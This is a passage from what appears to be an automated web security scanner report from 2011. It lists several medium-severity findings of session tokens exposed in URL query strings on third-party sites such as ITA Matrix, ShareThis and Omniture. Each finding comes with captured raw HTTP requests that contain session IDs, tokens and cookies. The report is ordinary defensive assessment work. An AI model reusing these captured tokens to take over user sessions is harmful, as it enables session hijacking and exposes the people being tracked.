Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/png
Date: Tue, 26 Apr 2011 21:48:15 GMT
ETag: "96fb3e095853a8b8bbf0ac3c6cc2236c"
Last-Modified: Wed, 20 Oct 2010 05:40:03 GMT
Server: ECS (dca/5336)
X-Cache: HIT
Content-Length: 27158

.PNG
.
...IHDR...i.........1.$.....sBIT....|.d... .IDATx...i.e.U........x/"2"232..t:.NgQ.e04%u...i..n&!$...HH..@-.Z%.....]...R..8]nS.0...8.O..t.9.<...|.9{......Y..cw..:..x..s..w........#~.g~&._.._.z
...[SNIP]...

11.3. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F51dde360-e809-412c-ae67-1f21b2b26abd.png%3F273&&w==105&&h==158&&type==fill  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://i.widgetserver.com
Path:   /ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F51dde360-e809-412c-ae67-1f21b2b26abd.png%3F273&&w==105&&h==158&&type==fill

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F51dde360-e809-412c-ae67-1f21b2b26abd.png%3F273&&w==105&&h==158&&type==fill?token=d654f174116d5feddd222fa610dddcaae5e0ff3c0000012f8ec04952 HTTP/1.1
Host: i.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/mobile/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/png
Date: Tue, 26 Apr 2011 21:48:24 GMT
ETag: "5dc31640d848a57c5cc6bd91bd66380e"
Last-Modified: Thu, 18 Nov 2010 04:01:33 GMT
Server: ECS (dca/533B)
X-Cache: HIT
Content-Length: 17471

.PNG
.
...IHDR...i.........1.$.....sBIT....|.d... .IDATx...y..Wu...g..t...A.m..,.l<bP.c.!q. @.....B.e..-.$.zU....0....<..16...#,..,..ZS....sz8...........%...)^U].}....{.a........y.IU.z.[.xI.$so].
...[SNIP]...

11.4. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F61f261a6-0395-4a73-ad28-aa6682f1cb2c.png%3F39&&w==105&&h==158&&type==fill  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://i.widgetserver.com
Path:   /ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F61f261a6-0395-4a73-ad28-aa6682f1cb2c.png%3F39&&w==105&&h==158&&type==fill

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F61f261a6-0395-4a73-ad28-aa6682f1cb2c.png%3F39&&w==105&&h==158&&type==fill?token=d654f174116d5feddd222fa610dddcaae5e0ff3c0000012f8ec04952 HTTP/1.1
Host: i.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/mobile/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/png
Date: Tue, 26 Apr 2011 21:48:22 GMT
ETag: "84714ab0abbe24ddba75a077294e847a"
Last-Modified: Thu, 09 Dec 2010 17:07:39 GMT
Server: ECS (dca/53EE)
X-Cache: HIT
Content-Length: 23038

.PNG
.
...IHDR...i.........1.$.....sBIT....|.d... .IDATx...wxdw}..:gzQ.I3.um.........MK.C.$8.o~OBK..nro.g..!7..MBB...l..$..cl..f.....V.K#...v...1.~w4+.....|.g...9s..}....*.....EQP...0....ap-.t]_q_..
...[SNIP]...

11.5. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F98ecf5a3-3ea4-48fc-871b-1a4d63125e12.png%3F38&&w==105&&h==158&&type==fill  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://i.widgetserver.com
Path:   /ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F98ecf5a3-3ea4-48fc-871b-1a4d63125e12.png%3F38&&w==105&&h==158&&type==fill

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F98ecf5a3-3ea4-48fc-871b-1a4d63125e12.png%3F38&&w==105&&h==158&&type==fill?token=d654f174116d5feddd222fa610dddcaae5e0ff3c0000012f8ec04952 HTTP/1.1
Host: i.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/mobile/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/png
Date: Tue, 26 Apr 2011 21:48:31 GMT
ETag: "16964ea529c285dd6aa021e3197a0510"
Last-Modified: Wed, 20 Oct 2010 13:47:17 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 15480

.PNG
.
...IHDR...i.........1.$.....sBIT....|.d... .IDATx.....e.y.............. @P ...D...hb,........G.1..|.c...Gc..a..dO...8.ER...    b_...^.......z.L.U....!..AUL=.Uu..sN.y.|...=)..O....{......t.>.B.
...[SNIP]...

11.6. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Faa71f5ac-e60e-44f1-8999-f5bf0858f0a6.png%3F24&&w==105&&h==158&&type==fill  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://i.widgetserver.com
Path:   /ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Faa71f5ac-e60e-44f1-8999-f5bf0858f0a6.png%3F24&&w==105&&h==158&&type==fill

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Faa71f5ac-e60e-44f1-8999-f5bf0858f0a6.png%3F24&&w==105&&h==158&&type==fill?token=d654f174116d5feddd222fa610dddcaae5e0ff3c0000012f8ec04952 HTTP/1.1
Host: i.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/mobile/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/png
Date: Tue, 26 Apr 2011 21:48:15 GMT
ETag: "8c1604e8c214cc15c49d717d841843a8"
Last-Modified: Wed, 20 Oct 2010 17:21:08 GMT
Server: ECS (dca/53E8)
X-Cache: HIT
Content-Length: 23499

.PNG
.
...IHDR...i.........1.$.....sBIT....|.d... .IDATx...w...}..3;...[T.UE.j Q.......wSl..K^\^..K.......c'......@...6..&D.M...z.....3......#....~.7...=:w...z........A...p........P %tS.t.....m.
...[SNIP]...

11.7. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Fcdac24b6-3da0-4096-999a-413159cf40e7.png%3F71&&w==105&&h==158&&type==fill  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://i.widgetserver.com
Path:   /ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Fcdac24b6-3da0-4096-999a-413159cf40e7.png%3F71&&w==105&&h==158&&type==fill

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Fcdac24b6-3da0-4096-999a-413159cf40e7.png%3F71&&w==105&&h==158&&type==fill?token=d654f174116d5feddd222fa610dddcaae5e0ff3c0000012f8ec04952 HTTP/1.1
Host: i.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/mobile/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/png
Date: Tue, 26 Apr 2011 21:48:35 GMT
ETag: "2a721535e05be74afc49402140bf3056"
Last-Modified: Wed, 19 Jan 2011 02:08:05 GMT
Server: ECS (dca/533D)
X-Cache: HIT
Content-Length: 36906

.PNG
.
...IHDR...i.........1.$.....sBIT....|.d... .IDATx...g.egy......S..U].].[..:(......@..F..0...1 k.............3C0....@BHH.AK.n.A..9VUW.'.}v.....$.M..?..V.......}...?.>..w.......C.,..v3.{.>...;]
...[SNIP]...

11.8. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Fe7b3a682-8e5d-43db-a0bb-732298974c3f.png%3F35&&w==105&&h==158&&type==fill  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://i.widgetserver.com
Path:   /ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Fe7b3a682-8e5d-43db-a0bb-732298974c3f.png%3F35&&w==105&&h==158&&type==fill

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Fe7b3a682-8e5d-43db-a0bb-732298974c3f.png%3F35&&w==105&&h==158&&type==fill?token=d654f174116d5feddd222fa610dddcaae5e0ff3c0000012f8ec04952 HTTP/1.1
Host: i.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/mobile/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/png
Date: Tue, 26 Apr 2011 21:48:23 GMT
ETag: "1161d1cc809334e0d459ab3c38a3290a"
Last-Modified: Wed, 20 Oct 2010 06:28:44 GMT
Server: ECS (dca/53F3)
X-Cache: HIT
Content-Length: 22500

.PNG
.
...IHDR...i.........1.$.....sBIT....|.d... .IDATx...w.e.].......Y...e....jG;54j.Fj!@ ..e.......Yv....h.p...h..3....24...F..VR...UWW.2Y6.....u..G.{......f.t.S.^.wMD...g".....5o...^XXx...?t..j
...[SNIP]...

11.9. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Ffbfc48e1-fa2b-4d0f-a4d8-5950c30fd079.png%3F174&&w==105&&h==158&&type==fill  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://i.widgetserver.com
Path:   /ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Ffbfc48e1-fa2b-4d0f-a4d8-5950c30fd079.png%3F174&&w==105&&h==158&&type==fill

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Ffbfc48e1-fa2b-4d0f-a4d8-5950c30fd079.png%3F174&&w==105&&h==158&&type==fill?token=d654f174116d5feddd222fa610dddcaae5e0ff3c0000012f8ec04952 HTTP/1.1
Host: i.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/mobile/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/png
Date: Tue, 26 Apr 2011 21:48:15 GMT
ETag: "054a4cdc05d1f38e07c5744bd4837af5"
Last-Modified: Mon, 14 Feb 2011 23:58:13 GMT
Server: ECS (dca/532E)
X-Cache: HIT
Content-Length: 26675

.PNG
.
...IHDR...i.........1.$.....sBIT....|.d... .IDATx...y|\W...=S.U*.J.eM.lI.......G..$.@....xt..y.......@.^.....p;t    . ....'q..x.`Y.e.*I.*.<...Q>'....n..~.[.O}J.:g.}..{.5..*..G.5...L.D..7}&I...
...[SNIP]...

11.10. http://l.sharethis.com/log  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /log

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /log?event=widget&source=button&publisher=dff1640b-f471-4781-9319-20022d66580e&hostname=www.computerworlduk.com&location=%2Fnews%2Fsecurity%2F3276305%2Foracle-responds-to-hacker-group-and-patches-javacom-vulnerability%2F&url=http%3A%2F%2Fwww.computerworlduk.com%2Fnews%2Fsecurity%2F3276305%2Foracle-responds-to-hacker-group-and-patches-javacom-vulnerability%2F%3Folo%3Drss&sessionID=1303854555165.86554&fpc=8f316ea-12f93c9a01d-4bc8d0c8-1&ts1303854613452.1&r_sessionID=&hash_flag=&shr=&count=1 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1; __uset=yes

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Tue, 26 Apr 2011 21:52:06 GMT
Connection: keep-alive


11.11. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&publisher=dff1640b-f471-4781-9319-20022d66580e&hostname=www.computerworlduk.com&location=%2Fnews%2Fsecurity%2F3276305%2Foracle-responds-to-hacker-group-and-patches-javacom-vulnerability%2F&url=http%3A%2F%2Fwww.computerworlduk.com%2Fnews%2Fsecurity%2F3276305%2Foracle-responds-to-hacker-group-and-patches-javacom-vulnerability%2F%3Folo%3Drss&sessionID=1303854555165.86554&fpc=8f316ea-12f93c9a01d-4bc8d0c8-1&ts1303854579844.0&r_sessionID=&hash_flag=&shr=&count=1 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Tue, 26 Apr 2011 21:51:37 GMT
Connection: keep-alive


11.12. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fmatrix.itasoftware.com%2F&callback=_xdc_._rjf7ns&token=27263 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Tue, 26 Apr 2011 19:57:01 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 37

_xdc_._rjf7ns && _xdc_._rjf7ns( [1] )

11.13. http://matrix.itasoftware.com/view/details  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://matrix.itasoftware.com
Path:   /view/details

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /view/details?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61 HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/view/flights?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; searchFormState=%7B%22version%22%3A%220.7.20110124.2%22%2C%22json%22%3A%22%7B%5C%22mode%5C%22%3A%7B%5C%22date%5C%22%3A%5C%22exact%5C%22%2C%5C%22flightSelection%5C%22%3A%5C%22trip%5C%22%2C%5C%22flightView%5C%22%3A%5C%22trip%5C%22%2C%5C%22pageFlow%5C%22%3A%5C%22exact%5C%22%2C%5C%22trip%5C%22%3A%5C%22rt%5C%22%2C%5C%22calendarRange%5C%22%3A%5C%2230day%5C%22%7D%2C%5C%22searchForm%5C%22%3A%7B%5C%22mode%5C%22%3A%5C%22advanced%5C%22%2C%5C%22defaults%5C%22%3A%7B%5C%22multiCityRows%5C%22%3A2%7D%2C%5C%22awards%5C%22%3A%5C%22noawards%5C%22%2C%5C%22options%5C%22%3A%7B%5C%22showRoutingCodes%5C%22%3Afalse%2C%5C%22showFlightTimes%5C%22%3A%5Bfalse%2Cfalse%5D%2C%5C%22pax%5C%22%3A%5C%22simple%5C%22%7D%7D%7D%22%7D; __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.3.10.1303847824

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:00:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 5854


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-eq
...[SNIP]...

11.14. http://matrix.itasoftware.com/view/flights  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://matrix.itasoftware.com
Path:   /view/flights

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /view/flights?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61 HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.2.10.1303847824; __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; searchFormState=%7B%22version%22%3A%220.7.20110124.2%22%2C%22json%22%3A%22%7B%5C%22mode%5C%22%3A%7B%5C%22date%5C%22%3A%5C%22exact%5C%22%2C%5C%22flightSelection%5C%22%3A%5C%22trip%5C%22%2C%5C%22flightView%5C%22%3A%5C%22trip%5C%22%2C%5C%22pageFlow%5C%22%3A%5C%22exact%5C%22%2C%5C%22trip%5C%22%3A%5C%22rt%5C%22%2C%5C%22calendarRange%5C%22%3A%5C%2230day%5C%22%7D%2C%5C%22searchForm%5C%22%3A%7B%5C%22mode%5C%22%3A%5C%22advanced%5C%22%2C%5C%22defaults%5C%22%3A%7B%5C%22multiCityRows%5C%22%3A2%7D%2C%5C%22awards%5C%22%3A%5C%22noawards%5C%22%2C%5C%22options%5C%22%3A%7B%5C%22showRoutingCodes%5C%22%3Afalse%2C%5C%22showFlightTimes%5C%22%3A%5Bfalse%2Cfalse%5D%2C%5C%22pax%5C%22%3A%5C%22simple%5C%22%7D%7D%7D%22%7D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:57:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 5328


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-eq
...[SNIP]...

11.15. http://matrix.itasoftware.com/xhr/shop/summarize  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://matrix.itasoftware.com
Path:   /xhr/shop/summarize

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xhr/shop/summarize?solutionSet=05INN3JQ6GZDNnhLMlbFgJ0&session=0100DBeALDQcNVSQ79mWVpW40&summarizers=solutionList&format=JSON&inputs=%7B%22salesCity%22%3A%22BOS%22%2C%22slices%22%3A%5B%7B%22origins%22%3A%5B%22BOS%22%5D%2C%22destinations%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-04-30%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%2C%7B%22destinations%22%3A%5B%22BOS%22%5D%2C%22origins%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-05-18%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%5D%2C%22pax%22%3A%7B%22adults%22%3A1%7D%2C%22cabin%22%3A%22COACH%22%2C%22changeOfAirport%22%3Atrue%2C%22checkAvailability%22%3Atrue%2C%22page%22%3A%7B%22size%22%3A30%7D%2C%22sorts%22%3A%22default%22%2C%22filter%22%3A%7B%22maxStopCount%22%3A%7B%22values%22%3A%5B1%5D%7D%2C%22carriers%22%3A%7B%22values%22%3A%5B%22*%22%5D%7D%7D%7D HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/view/flights?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; searchFormState=%7B%22version%22%3A%220.7.20110124.2%22%2C%22json%22%3A%22%7B%5C%22mode%5C%22%3A%7B%5C%22date%5C%22%3A%5C%22exact%5C%22%2C%5C%22flightSelection%5C%22%3A%5C%22trip%5C%22%2C%5C%22flightView%5C%22%3A%5C%22trip%5C%22%2C%5C%22pageFlow%5C%22%3A%5C%22exact%5C%22%2C%5C%22trip%5C%22%3A%5C%22rt%5C%22%2C%5C%22calendarRange%5C%22%3A%5C%2230day%5C%22%7D%2C%5C%22searchForm%5C%22%3A%7B%5C%22mode%5C%22%3A%5C%22advanced%5C%22%2C%5C%22defaults%5C%22%3A%7B%5C%22multiCityRows%5C%22%3A2%7D%2C%5C%22awards%5C%22%3A%5C%22noawards%5C%22%2C%5C%22options%5C%22%3A%7B%5C%22showRoutingCodes%5C%22%3Afalse%2C%5C%22showFlightTimes%5C%22%3A%5Bfalse%2Cfalse%5D%2C%5C%22pax%5C%22%3A%5C%22simple%5C%22%7D%7D%7D%22%7D; __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.3.10.1303847824

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:00:23 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 34124

{}&&{"result":{"datacenter":"01","id":"7t9BFpmbcCaksApb60DBeC","session":"0100DBeALDQcNVSQ79mWVpW40","solutionCount":500,"solutionSet":"05INN3JQ6GZDNnhLMlbFgJ0","solutionList":{"minPrice":"USD251.00",
...[SNIP]...

11.16. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=4&product_key=testandtarget&billboard_type=successstory&mbox=productpage_feature&mboxId=1&mboxTime=1303832137594&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 1013
Date: Tue, 26 Apr 2011 20:35:26 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('productpage_feature',1);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defa
...[SNIP]...

11.17. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

